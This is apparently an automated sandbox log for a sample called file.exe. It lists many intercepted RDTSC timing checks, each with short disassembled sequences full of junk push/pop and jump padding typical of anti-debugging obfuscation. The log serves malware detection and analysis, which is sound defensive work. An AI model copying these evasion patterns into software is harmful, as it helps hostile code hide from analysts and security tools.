Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA03C7 second address: CA03D9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F423CC2AB18h 0x00000008 jc 00007F423CC2AB22h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA051E second address: CA0528 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F423D327E2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0646 second address: CA064D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5E14 second address: CA5E2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F423D327E2Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5E2C second address: CA5E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5F7F second address: CA5F8B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F423D327E26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5F8B second address: CA5FA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F423CC2AB24h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5FA4 second address: CA5FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F423D327E26h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5FB5 second address: CA5FC7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F423CC2AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5FC7 second address: CA5FF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E37h 0x00000007 jbe 00007F423D327E26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F423D327E26h 0x00000017 jno 00007F423D327E26h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA5FF6 second address: CA600C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB1Ch 0x00000007 jng 00007F423CC2AB16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB768C second address: CB7694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB7694 second address: CB7699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB7699 second address: CB76CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F423D327E32h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB76CF second address: CB76D9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F423CC2AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB991A second address: CB9924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F423D327E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB9924 second address: CB9928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC5A52 second address: CC5AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Eh 0x00000007 jmp 00007F423D327E2Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 jbe 00007F423D327E26h 0x00000018 pop esi 0x00000019 jne 00007F423D327E4Ah 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC5AA9 second address: CC5ABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB1Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC87F6 second address: CC8801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F423D327E26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC833D second address: CC8341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8341 second address: CC8345 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8345 second address: CC8353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F423CC2AB16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8353 second address: CC8372 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F423D327E26h 0x00000008 jmp 00007F423D327E35h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8372 second address: CC837D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F423CC2AB16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC8505 second address: CC8509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE1E0F second address: CE1E1A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 ja 00007F423CC2AB16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE1E1A second address: CE1E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F423D327E50h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE1FCB second address: CE1FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jp 00007F423CC2AB1Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE1FDD second address: CE1FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F423D327E2Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2106 second address: CE210A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE210A second address: CE210E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE210E second address: CE2125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F423CC2AB21h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2125 second address: CE212F instructions: 0x00000000 rdtsc 0x00000002 js 00007F423D327E2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE212F second address: CE213F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 jno 00007F423CC2AB16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2297 second address: CE229B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE229B second address: CE22A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE23BF second address: CE23E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F423D327E26h 0x0000000a jmp 00007F423D327E38h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE26A3 second address: CE26A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE26A7 second address: CE26D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jnp 00007F423D327E26h 0x0000000f pop ecx 0x00000010 push edx 0x00000011 js 00007F423D327E26h 0x00000017 pop edx 0x00000018 jmp 00007F423D327E34h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE26D9 second address: CE26E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE26E1 second address: CE26F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423D327E2Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2831 second address: CE2836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE2C7B second address: CE2C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE7014 second address: CE701A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE701A second address: CE703C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F423D327E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F423D327E33h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE75C7 second address: CE75CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE87AD second address: CE87C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423D327E33h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE87C6 second address: CE87CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE87CA second address: CE87F3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F423D327E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F423D327E2Dh 0x00000014 pop edi 0x00000015 ja 00007F423D327E2Ch 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEA2FC second address: CEA30F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F423CC2AB1Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEA30F second address: CEA329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F423D327E26h 0x0000000b jbe 00007F423D327E26h 0x00000011 popad 0x00000012 jbe 00007F423D327E2Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED00D9 second address: 4ED00DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED00DD second address: 4ED00E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED00E3 second address: 4ED0152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F423CC2AB20h 0x00000009 sub eax, 2ED1F488h 0x0000000f jmp 00007F423CC2AB1Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F423CC2AB28h 0x0000001b add ah, FFFFFFE8h 0x0000001e jmp 00007F423CC2AB1Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 jmp 00007F423CC2AB26h 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED0152 second address: 4ED016E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED016E second address: 4ED01B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F423CC2AB21h 0x00000008 call 00007F423CC2AB20h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F423CC2AB21h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov cl, 89h 0x0000001c mov dh, 98h 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED01B7 second address: 4ED01BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED01BB second address: 4ED01D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0DDC second address: 4EB0DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0DE0 second address: 4EB0DEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0DEE second address: 4EB0E1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, 6AF2568Bh 0x00000012 jmp 00007F423D327E30h 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0E1A second address: 4EB0E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0E37 second address: 4EB0E59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cx, di 0x00000011 mov dx, 5ECAh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0E59 second address: 4EB0E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0E5F second address: 4EB0E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0E63 second address: 4EB0E79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F00028 second address: 4F00077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F423D327E2Ch 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 jmp 00007F423D327E31h 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F423D327E2Ch 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F00077 second address: 4F000E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F423CC2AB1Bh 0x00000011 adc eax, 4AA8BC4Eh 0x00000017 jmp 00007F423CC2AB29h 0x0000001c popfd 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 jmp 00007F423CC2AB1Eh 0x00000025 pop ebp 0x00000026 pushad 0x00000027 mov cx, 3E9Dh 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F423CC2AB28h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90134 second address: 4E90172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F423D327E2Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F423D327E37h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E90172 second address: 4E9018A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423CC2AB24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0BFE second address: 4EB0C2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F423D327E2Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0C2B second address: 4EB0C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0C31 second address: 4EB0C54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F423D327E2Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0C54 second address: 4EB0C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0C59 second address: 4EB0C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F423D327E2Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F423D327E2Eh 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F423D327E37h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0704 second address: 4EB0708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0708 second address: 4EB070E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB070E second address: 4EB07A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F423CC2AB22h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F423CC2AB1Bh 0x0000000f adc ch, FFFFFFCEh 0x00000012 jmp 00007F423CC2AB29h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d mov ax, 3173h 0x00000021 mov ecx, 42E271CFh 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F423CC2AB20h 0x00000030 add eax, 743E3878h 0x00000036 jmp 00007F423CC2AB1Bh 0x0000003b popfd 0x0000003c pushad 0x0000003d mov cx, DF45h 0x00000041 pushad 0x00000042 popad 0x00000043 popad 0x00000044 popad 0x00000045 pop ebp 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 jmp 00007F423CC2AB23h 0x0000004e mov dx, cx 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB0353 second address: 4EB039B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 push eax 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F423D327E2Ah 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov edx, eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F423D327E38h 0x0000001e or ecx, 315261E8h 0x00000024 jmp 00007F423D327E2Bh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EB039B second address: 4EB03FE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F423CC2AB28h 0x00000008 jmp 00007F423CC2AB25h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pop ebp 0x00000012 pushad 0x00000013 mov esi, 45634853h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F423CC2AB26h 0x00000020 adc al, FFFFFFD8h 0x00000023 jmp 00007F423CC2AB1Bh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0282 second address: 4EC0286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC0286 second address: 4EC02A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423CC2AB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0F44 second address: 4EF0F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F423D327E2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EF0F56 second address: 4EF0F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED04F4 second address: 4ED051D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F423D327E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F423D327E35h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED051D second address: 4ED0593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, BBh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c pushad 0x0000000d movsx edx, cx 0x00000010 push ecx 0x00000011 pushfd 0x00000012 jmp 00007F423CC2AB23h 0x00000017 sub cx, 5FFEh 0x0000001c jmp 00007F423CC2AB29h 0x00000021 popfd 0x00000022 pop ecx 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F423CC2AB28h 0x0000002e or ax, 8E28h 0x00000033 jmp 00007F423CC2AB1Bh 0x00000038 popfd 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED0593 second address: 4ED0598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
